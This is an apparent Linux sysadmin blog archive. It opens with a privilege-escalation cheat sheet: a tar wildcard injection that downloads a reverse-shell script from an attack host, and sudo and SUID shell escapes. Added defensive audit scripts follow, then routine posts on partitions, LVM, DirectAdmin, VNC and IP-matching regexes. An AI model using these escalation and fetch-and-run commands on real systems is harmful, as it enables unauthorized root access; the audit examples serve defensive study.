Saturday, December 9, 2017

Linux Privilege Escalation Methods

1. Kernel Exploits
1.1 Dirty Cow Exploit: https://dirtycow.ninja/
2. Exploiting Weak Services
3.1 Wildcard Injection

Crontab:
0 5 * * * root tar -zcf /var/backups/home.tgz /home/*

==>
[user@localhost home]$ wget http://192.168.0.66/rshell.sh
[user@localhost home]$ touch "--checkpoint-action=exec=sh rshell.sh"
[user@localhost home]$ touch "--checkpoint=1"
<Open a listener on attack platform, wait for cronjob to execute rshell.sh.>
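
An audit for the pattern above, as an added example that is not part of the original post. The injection depends on a glob that expands to words starting with "-", which happens with a relative * evaluated inside a user-writable directory; a path-prefixed glob such as /home/* expands to words starting with "/" and cannot be read as options. The function names and the sample crontab are constructed for illustration.

```shell
#!/bin/sh
# Added audit example; function names and sample data are constructed.

# Read crontab text on stdin and print job lines whose command passes a
# relative glob (a word containing "*" that does not start with "/" or "./")
# without a preceding "--" end-of-options marker.
risky_cron_globs() {
    awk '
    /^[ \t]*(#|$)/ { next }                    # comments and blank lines
    /^[ \t]*[A-Za-z_]+[ \t]*=/ { next }        # VAR=value settings
    {
        first = ($1 ~ /^@/) ? 2 : 6            # skip @reboot or 5 time fields
        guarded = 0
        for (i = first; i <= NF; i++) {
            if ($i == "--") { guarded = 1; continue }
            if ($i ~ /^[;&|]+$/) { guarded = 0; continue }   # next command
            if ($i ~ /\*/ && $i !~ /^\.?\// && !guarded) { print; next }
        }
    }'
}

# List entries directly inside directory $1 whose names begin with "-".
dash_names() {
    find "$1" -mindepth 1 -maxdepth 1 -name '-*' -print | sort
}

SAMPLE_CRON='# constructed sample crontab
0 5 * * * root tar -zcf /var/backups/home.tgz /home/*
0 5 * * * root cd /home/user && tar -zcf /var/backups/home.tgz *
0 5 * * * root cd /home/user && tar -zcf /var/backups/home.tgz -- *
0 5 * * * root cd /home/user && tar -zcf /var/backups/home.tgz ./*
@reboot /usr/bin/vncserver :1'

# Only the third line of the sample (relative "*", no "--") is reported.
printf '%s\n' "$SAMPLE_CRON" | risky_cron_globs
```

Run dash_names against any directory that a scheduled job archives or changes ownership of; an entry such as --checkpoint=1 there is worth investigating.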

3.3 The Infamous SUID Executable
find directory -user root -perm -4000 -exec ls -ld {} \; >/tmp/setuid

[user@localhost home]$ nmap --interactive
nmap> !sh
# whoami
root
3.4 Exploiting SUDO Users
sudo find /etc -exec sh -i \;
[user@localhost]$ sudo
:shell
[root@localhost]#

[user@localhost]$ sudo less file.txt
!bash
[root@localhost]#

[user@localhost]$ sudo more long_file.txt
!bash
[root@localhost]#

[user@localhost]$ sudo python -c 'import pty; pty.spawn("/bin/sh")'
[user@localhost]$ sudo perl -e 'exec "/bin/sh";'
[user@localhost]$ sudo ruby -e 'exec "/bin/sh"'
sudo zip /tmp/exploit.zip /tmp/exploit -T --unzip-command="sh -c /bin/bash"
sudo tar cf /dev/null /tmp/exploit --checkpoint=1 --checkpoint-action=exec=/bin/bash
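
A check for the sudo grants listed above, as an added example that is not part of the original post. It reads sudoers-style rules and reports entries that grant one of the programs this section names, or unrestricted ALL; the function name and sample rules are constructed, and the parser covers simple one-line rules only.

```shell
#!/bin/sh
# Added audit example; function name and sample rules are constructed.

# Read sudoers-style rules on stdin and print "user: command" for every
# grant of a program that can start a shell (the ones listed in this
# section) or of unrestricted ALL. Handles simple one-line rules only.
escape_capable_sudo() {
    awk '
    BEGIN {
        n = split("find less more python perl ruby zip tar", b, " ")
        for (i = 1; i <= n; i++) risky[b[i]] = 1
    }
    /^[ \t]*(#|$)/ { next }                          # comments, blank lines
    /^[ \t]*(Defaults|[A-Za-z]+_Alias)/ { next }     # settings and aliases
    {
        user = $1
        spec = $0
        sub(/^[^=]*=/, "", spec)                     # keep the command list
        gsub(/\([^)]*\)/, "", spec)                  # drop (runas) parts
        gsub(/[A-Z]+:/, "", spec)                    # drop tags like NOPASSWD:
        m = split(spec, cmds, ",")
        for (j = 1; j <= m; j++) {
            split(cmds[j], w, " ")
            path = w[1]
            name = path
            sub(/.*\//, "", name)                    # basename
            sub(/[0-9.]+$/, "", name)                # python3 -> python
            if (path == "ALL" || (name in risky)) print user ": " path
        }
    }'
}

SAMPLE_SUDOERS='# constructed sample rules
Defaults env_reset
alice ALL=(root) NOPASSWD: /usr/bin/less /var/log/syslog, /usr/bin/systemctl status nginx
bob ALL=(root) /usr/bin/find, /usr/bin/python3
carol ALL=(root) /usr/sbin/service httpd restart
%admin ALL=(ALL) ALL'

# Reports alice (less), bob (find, python3) and %admin (ALL); carol is not listed.
printf '%s\n' "$SAMPLE_SUDOERS" | escape_capable_sudo
```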

4. Physical Access Attacks
4.1 LUKS Vulnerability – Enter Key to Root in 70 Seconds


Thursday, November 30, 2017

How to use a new partition in RHEL6 without reboot?

Environment

  • Red Hat Enterprise Linux 6

Issue

  • Added a new partition to a disk that has some existing partitions already mounted. Can the new partition be used without reboot in RHEL6?
  • New partition created with fdisk command is not visible in the OS.

Resolution

partprobe was commonly used in RHEL 5 to inform the OS of partition table changes on the disk. In RHEL 6, it will only trigger the OS to update the partitions on a disk if none of that disk's partitions are in use (e.g. mounted). If any partition on a disk is in use, partprobe will not trigger the OS to update partitions in the system because it is considered unsafe in some situations.
So in general we would suggest:
  1. Unmount all the partitions of the disk before modifying the partition table on the disk, and then run partprobe to update the partitions in system.
  2. If this is not possible (e.g. the mounted partition is a system partition), reboot the system after modifying the partition table. The partitions information will be re-read after reboot.
If a new partition was added and none of the existing partitions were modified, consider using the partx command to update the system partition table. Note that the partx command does not do much checking between the new and the existing partition table in the system and assumes the user knows what they are doing. It can therefore corrupt the data on disk if the existing partitions are modified or the partition table is not set correctly, so use it at your own risk.
For example, a partition #1 is an existing partition and a new partition #2 is already added in /dev/sdb by fdisk. Here we use partx -v -a /dev/sdb to add the new partition to the system:
# ls /dev/sdb*  
/dev/sdb  /dev/sdb1  
List the partition table of disk:
# partx -l /dev/sdb
# 1:        63-   505007 (   504945 sectors,    258 MB)  
# 2:    505008-  1010015 (   505008 sectors,    258 MB)  
# 3:         0-       -1 (        0 sectors,      0 MB)  
# 4:         0-       -1 (        0 sectors,      0 MB)  
Read disk and try to add all partitions to the system:
# partx -v -a /dev/sdb                                         
device /dev/sdb: start 0 size 2097152  
gpt: 0 slices  
dos: 4 slices  
# 1:        63-   505007 (   504945 sectors,    258 MB)  
# 2:    505008-  1010015 (   505008 sectors,    258 MB)  
# 3:         0-       -1 (        0 sectors,      0 MB)  
# 4:         0-       -1 (        0 sectors,      0 MB)  
BLKPG: Device or resource busy
error adding partition 1
(These last 2 lines are normal in this case because partition 1 is already added in the system before partition 2 is added)
Check that we have device nodes for /dev/sdb itself and the partitions on it:
# ls /dev/sdb*  
/dev/sdb  /dev/sdb1  /dev/sdb2

Tuesday, November 28, 2017

How to change your server IP address in DirectAdmin

To change the IP address for DirectAdmin and the DNS server, follow these steps:
Connect to your VPS server using SSH (e.g. PuTTY)
Go to /usr/local/directadmin/scripts directory:
# cd /usr/local/directadmin/scripts
Start ipswap.sh script to change old IP address for your Control Panel and DNS server to the new one (e.g. # ./ipswap.sh 8.8.8.8 7.7.7.7):
# ./ipswap.sh old_ip new_ip
Restart all services for the changes to take effect:
# /etc/init.d/httpd restart
# /etc/init.d/proftpd restart
# /etc/init.d/exim restart
# /etc/init.d/dovecot restart

Extending a logical volume in a virtual machine running Red Hat or CentOS

- Power off the virtual machine.
- Edit the virtual machine settings and extend the virtual disk size. For more information, see Increasing the size of a virtual disk (1004047).
- Power on the virtual machine.
- Identify the device name, which is by default /dev/sda, and confirm the new size by running the command:

# fdisk -l

- Create a new primary partition:
Run the command:

# fdisk /dev/sda (depending on the results of step 4)
Press p to print the partition table to identify the number of partitions. By default, there are 2: sda1 and sda2.
Press n to create a new primary partition.
Press p for primary.
Press 3 for the partition number, depending on the output of the partition table print.
Press Enter two times.
Press t to change the system's partition ID.
Press 3 to select the newly created partition.
Type 8e to change the Hex Code of the partition for Linux LVM.
Press w to write the changes to the partition table.

- Restart the virtual machine.
- Run this command to verify that the changes were saved to the partition table and that the new partition has an 8e type:

# fdisk -l

- Run this command to convert the new partition to a physical volume:

Note: The number for the sda can change depending on system setup. Use the sda number that was created in step 5.

# pvcreate /dev/sda3

- Run this command to extend the physical volume:

# vgextend VolGroup00 /dev/sda3

Note: To determine which volume group to extend, use the command vgdisplay.

- Run this command to verify how many physical extents are available to the Volume Group:

# vgdisplay VolGroup00 | grep "Free"

- Run the following command to extend the Logical Volume:

# lvextend -L+#G /dev/VolGroup00/LogVol00

Where # is the number of Free space in GB available as per the previous command. Use the full number output from Step 10 including any decimals.

Note: To determine which logical volume to extend, use the command lvdisplay.

- Run the following command to expand the ext3 filesystem online, inside of the Logical Volume:

# ext2online /dev/VolGroup00/LogVol00

- Notes:
Use resize2fs instead of ext2online if it is not a Red Hat virtual machine.
By default, Red Hat and CentOS 7 use the XFS file system; you can grow the file system by running the xfs_growfs command.

Run the following command to verify that the / filesystem has the new space available:

# df -h /
- Related Information

Note: If the extended vmdk does not reflect the new size under Linux guest OS, rescan SCSI device using the following command:

echo 1 > /sys/block/$DEVICE/device/rescan where $DEVICE is 'sda'

For example:

echo 1 > /sys/block/sda/device/rescan

Wednesday, November 22, 2017

Install VNC on Ubuntu 16.04

Virtual network computing, or VNC, is a graphical desktop sharing system that allows you to control one computer remotely from another. A VNC server transfers keyboard and mouse events, and displays the remote host’s screen via a network connection, which allows you to operate a full desktop environment on your Linode.
This guide explains how to install a graphic desktop environment on your Linode running Ubuntu 16.04 and how to connect to it from your local computer using VNC.

Before You Begin

  1. Familiarize yourself with our Getting Started guide and complete the steps for setting your Linode’s hostname and timezone.
  2. Complete the sections of our Securing Your Server guide to create a standard user account, harden SSH access and remove unnecessary network services.
  3. Update your system.
    sudo apt-get update && sudo apt-get upgrade
    
This guide is written for a non-root user. Commands that require elevated privileges are prefixed with sudo. If you’re not familiar with the sudo command, you can check our Users and Groups guide.

Install a Desktop and VNC Server on your Linode

  1. Ubuntu has several desktop environments available in its repositories. The following command installs the default desktop, Unity, as well as several packages that are required for the graphical interface to work properly:
    sudo apt-get install ubuntu-desktop gnome-panel gnome-settings-daemon metacity nautilus gnome-terminal
    
    This will install the full Ubuntu desktop environment, including office and web browsing tools. To install the desktop without these packages, run:
    sudo apt-get install --no-install-recommends ubuntu-desktop gnome-panel gnome-settings-daemon metacity nautilus gnome-terminal
    
    During the install process, you will be asked whether or not to change a system file to the new version:
    Configuration file '/etc/init/tty1.conf'
     ==> File on system created by you or by a script.
     ==> File also in package provided by package maintainer.
       What would you like to do about it ?  Your options are:
        Y or I  : install the package maintainer's version
        N or O  : keep your currently-installed version
          D     : show the differences between the versions
          Z     : start a shell to examine the situation
     The default action is to keep your current version.
    *** tty1.conf (Y/I/N/O/D/Z) [default=N] ?
    
    Type y then enter to use the updated version.
  2. Install the VNC server:
    sudo apt-get install vnc4server
    

Secure your VNC connection

The VNC server generates a display, or graphical output, identified by a number that is defined when the server starts. If no display number is defined, the server will use the lowest one available. VNC connections take place on port 5900 + display. In this section we’ll use a display number of 1; therefore, we’ll connect to remote port 5901.
The default VNC connection is unencrypted. In order to secure your passwords and data, you will need to tunnel the traffic through an SSH connection to a local port. We’ll use the same local port for consistency.

Mac OS X and Linux

  1. From your desktop, connect to your Linode with the following command. Be sure to replace user@example.com with your username and your Linode’s hostname or IP address:
    ssh -L 5901:127.0.0.1:5901 user@example.com
    
  2. From your Linode, launch the VNC server to test your connection. You will be prompted to set a password:
    vncserver :1
    
  3. Initiate your connection as per the steps in the Connect to VNC from your Desktop section.

Windows

  1. Open PuTTY and navigate to Tunnels under the SSH section in the menu. Add a new forwarded port as shown below, replacing example.com with your Linode’s IP address or hostname:
    Adding a forwarded port to PuTTY.
  2. Click Add, then return to the ‘Session’ screen. Enter your Linode’s hostname or IP address and a title for your session. Click save to save your settings for future use, and then click open to initiate your SSH tunnel.
  3. Launch the VNC server to test your connection. You will be prompted to set a password:
    vncserver :1
    
  4. Initiate your connection as per the steps in the Connect to VNC from your Desktop section.
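
The SSH tunnel only protects traffic that goes through it; unless the VNC server is bound to loopback or firewalled, it still accepts direct connections on port 5900 + display. As an added example (not part of the original guide), this checks `ss -ltn` output for VNC listeners on non-loopback addresses; the function name, the 5900-5999 port range and the sample output are assumptions made for illustration.

```shell
#!/bin/sh
# Added check; function name, port range and sample output are constructed.

# Read `ss -ltn` output on stdin and report VNC listeners (ports 5900-5999,
# i.e. 5900 + display) that are bound to anything other than loopback.
exposed_vnc_listeners() {
    awk '$1 == "LISTEN" {
        addr = $4                                   # Local Address:Port column
        port = addr
        sub(/.*:/, "", port)                        # text after the last colon
        host = substr(addr, 1, length(addr) - length(port) - 1)
        if (port + 0 < 5900 || port + 0 > 5999) next
        if (host ~ /^127\./ || host == "[::1]") next
        printf "display :%d reachable on %s\n", port - 5900, addr
    }'
}

SAMPLE_SS='State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port
LISTEN  0       5       0.0.0.0:5901        0.0.0.0:*
LISTEN  0       128     127.0.0.1:5902      0.0.0.0:*
LISTEN  0       128     0.0.0.0:22          0.0.0.0:*
LISTEN  0       5       [::]:5901           [::]:*
LISTEN  0       5       [::1]:5903          [::]:*'

# Reports display :1 twice (IPv4 and IPv6 wildcard); :2 and :3 are loopback-only.
printf '%s\n' "$SAMPLE_SS" | exposed_vnc_listeners
```

On the server, run `ss -ltn | exposed_vnc_listeners`. Xvnc's -localhost option, passed as `vncserver :1 -localhost`, restricts the server to connections from the same machine, which is all the tunnel needs.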

Connect to VNC from your Desktop

In this section, we’ll use a VNC client, or viewer, to connect to our server. A viewer is the software that draws the graphical display generated by the server and creates the output on your local computer.

Mac OS X and Windows

While there are many options for OS X and Windows, this guide will use RealVNC Viewer.
  1. After installing and opening the viewer, connect to the localhost through your VNC client. The format is localhost:#, where # is the display number we used in the Secure your VNC connection section:
    Connecting through an SSH tunnel.
  2. You will be warned that the connection is unencrypted, but if you have followed the steps above for securing your VNC connection, your session will be securely tunneled to your Linode. To proceed, press Continue.
    VNC Security Warning.
  3. You will be prompted to enter the password you specified in Step 4 of the previous section.
    The VNC password prompt.
After connecting, you will see a blank gray screen since the desktop processes have not yet been started. In the next section we will configure your Linode to launch a full desktop.

Linux

There are a variety of VNC clients available for Ubuntu desktops. You can find the list here. For this guide, we’ll be using Remmina, which is installed by default.
  1. Open Remmina.
    The Remmina Software.
  2. Click the button to Create a new remote desktop profile. Name your profile, specify the VNC protocol, and enter localhost:1 in the server field. The :1 in the server field corresponds to the display number. In the password section fill in the password you specified in Step 4 of the previous section:
    Settings for a Remmina remote desktop connection.
  3. Press Connect.
You’ll see a blank gray screen since the desktop processes have not yet started. In the next section, we will configure your Linode to launch a full desktop.

Configure VNC for a Full Desktop

In the next few steps, we’ll configure VNC to launch the full Unity desktop when it starts.
  1. Once you’ve successfully connected, exit the connection. Close the VNC server:
    vncserver -kill :1
    
  2. Edit the end of your ~/.vnc/xstartup file to match the following configuration. This starts the desktop dependencies as background processes upon starting the VNC server:
    ~/.vnc/xstartup
    #!/bin/sh
    
    # Uncomment the following two lines for normal desktop:
    # unset SESSION_MANAGER
    # exec /etc/X11/xinit/xinitrc
    
    [ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup
    [ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources
    xsetroot -solid grey
    vncconfig -iconic &
    x-terminal-emulator -geometry 80x24+10+10 -ls -title "$VNCDESKTOP Desktop" &
    x-window-manager &
    
    gnome-panel &
    gnome-settings-daemon &
    metacity &
    nautilus &
    
  3. Save and exit the file. Begin another VNC session:
    vncserver :1
    
  4. Connect from your local VNC client using the same steps from the previous section. You should now see the full Ubuntu Desktop:
    A VNC connection with a full Ubuntu desktop.

Starting VNC Server on Boot

Below we’ve outlined optional steps to ensure that the VNC server starts automatically after reboot.
  1. Open your crontab. If you’ve never edited it before, you may be prompted to choose a text editor:
    crontab -e
    no crontab for user - using an empty one
    
    Select an editor.  To change later, run 'select-editor'.
      1. /bin/ed
      2. /bin/nano        <---- easiest
      3. /usr/bin/vim.basic
      4. /usr/bin/vim.tiny
    
    Choose 1-4 [2]:
    
  2. Add @reboot /usr/bin/vncserver :1 to the bottom of the file. Your crontab should look like this:
    crontab
    # Edit this file to introduce tasks to be run by cron.
    #
    # Each task to run has to be defined through a single line
    # indicating with different fields when the task will be run
    # and what command to run for the task
    #
    # To define the time you can provide concrete values for
    # minute (m), hour (h), day of month (dom), month (mon),
    # and day of week (dow) or use '*' in these fields (for 'any').
    #
    # Notice that tasks will be started based on the cron's system
    # daemon's notion of time and timezones.
    #
    # Output of the crontab jobs (including errors) is sent through
    # email to the user the crontab file belongs to (unless redirected).
    #
    # For example, you can run a backup of all your user accounts
    # at 5 a.m every week with:
    # 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
    #
    # For more information see the manual pages of crontab(5) and cron(8)
    #
    # m h dom mon dow command
    
    @reboot /usr/bin/vncserver :1
    
  3. Save and exit the file. You can test by rebooting your Linode and attempting to connect to the VNC server.

More Information

You may wish to consult the following resources for additional information on this topic. While these are provided in the hope that they will be useful, please note that we cannot vouch for the accuracy or timeliness of externally hosted materials.

Ubuntu VNC Grey Screen

Seeing a grey screen like this? It seems to be a common problem when setting up Ubuntu 14.04 with VNC.


When trying to set up your Ubuntu machine, a common problem seems to come up: the grey screen. There is no login box, no options, no nothing. It seems like you followed all the right steps, and you’re logged in to the server but there is nothing there. It’s confusing. We’ve set up this little tutorial to help you figure out where you went wrong and how to fix it!

The problem for me at least, seemed to be that while I was running vncserver, I didn’t have a desktop running so there was really nothing to look at.

I edited this file:

~/.vnc/xstartup

The following code:
#!/bin/sh
export XKL_XMODMAP_DISABLE=1
unset SESSION_MANAGER
unset DBUS_SESSION_BUS_ADDRESS

gnome-panel &
gnome-settings-daemon &
metacity &
nautilus &
gnome-terminal &


That’s it! You may need a restart and everything should be working.

If you are still having trouble, try the following resources:

Ask Ubuntu:
http://askubuntu.com/questions/452497/14-04-vnc-xstartup-file

LazyGeek blog:
http://rbgeek.wordpress.com/2012/06/25/how-to-install-vnc-server-on-ubuntu-server-12-04/

Broderick tech:
http://broderick-tech.com/vncxstartup-files-ubuntu-14-04/

Monday, November 20, 2017

RegEx: Find IP Addresses in a File Using Grep

Here are some regular expressions that will help you to perform a validation and to extract all matched IP addresses from a file.
The following regular expressions match IPv4 addresses.
Matched IP addresses can be extracted from a file using grep command.
In this article you’ll find the regular expressions themselves and an example of how to extract matched IP addresses from a file with the grep command.

Regular Expression to Match IP Addresses

Use the following regular expression to match IPv4 addresses (actually it matches all expressions from 0.0.0.0 to 999.999.999.999).
"([0-9]{1,3}[\.]){3}[0-9]{1,3}"

Grep IP Addresses

Parse a file and print all expressions that match a range between 0.0.0.0 and 999.999.999.999.
$ grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" file.txt
This regular expression is quite simple but you should understand that not all matches are technically valid IP addresses.
Let’s find only valid IP addresses with the second regular expression.

Match only Valid IPv4 Addresses

Use the following regular expression to find and validate the IPv4 addresses:
"(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"

Grep Only Valid IP Addresses

Find and extract only valid IP addresses from a file:
$ grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" file.txt
Option                   Description
-E, --extended-regexp    Use extended regular expression
-o, --only-matching      Print IP addresses only

Omit the -o option to print the lines that contain IP addresses.
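
The "valid" pattern above has no boundary check, so it also matches inside longer digit runs: 999.1.1.1 yields 99.1.1.1. As an added example (not part of the original article), this applies the same pattern with grep's -w option to a few constructed log lines and counts the source addresses; the function names and the log are made up for illustration.

```shell
#!/bin/sh
# Added example; function names and log lines are constructed.

OCTET='(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)'
IPV4="$OCTET\\.$OCTET\\.$OCTET\\.$OCTET"     # the pattern from this article

# Extract addresses as the article does (no boundary check).
extract_ips() { grep -E -o "$IPV4"; }

# Same pattern; -w rejects matches that are glued to further digits.
extract_ips_bounded() { grep -E -o -w "$IPV4"; }

# Count occurrences per address, most frequent first: "<count> <address>".
count_ips() {
    extract_ips_bounded | sort | uniq -c | sort -rn | awk '{print $1, $2}'
}

SAMPLE_LOG='Nov 20 10:00:01 host sshd[101]: Failed password for root from 203.0.113.7 port 4242 ssh2
Nov 20 10:00:05 host sshd[102]: Failed password for admin from 203.0.113.7 port 4243 ssh2
Nov 20 10:00:09 host sshd[103]: Failed password for root from 198.51.100.23 port 5000 ssh2
Nov 20 10:01:00 host app[200]: build 999.1.1.1 deployed'

# The build number on the last line is not counted as an address.
printf '%s\n' "$SAMPLE_LOG" | count_ips
```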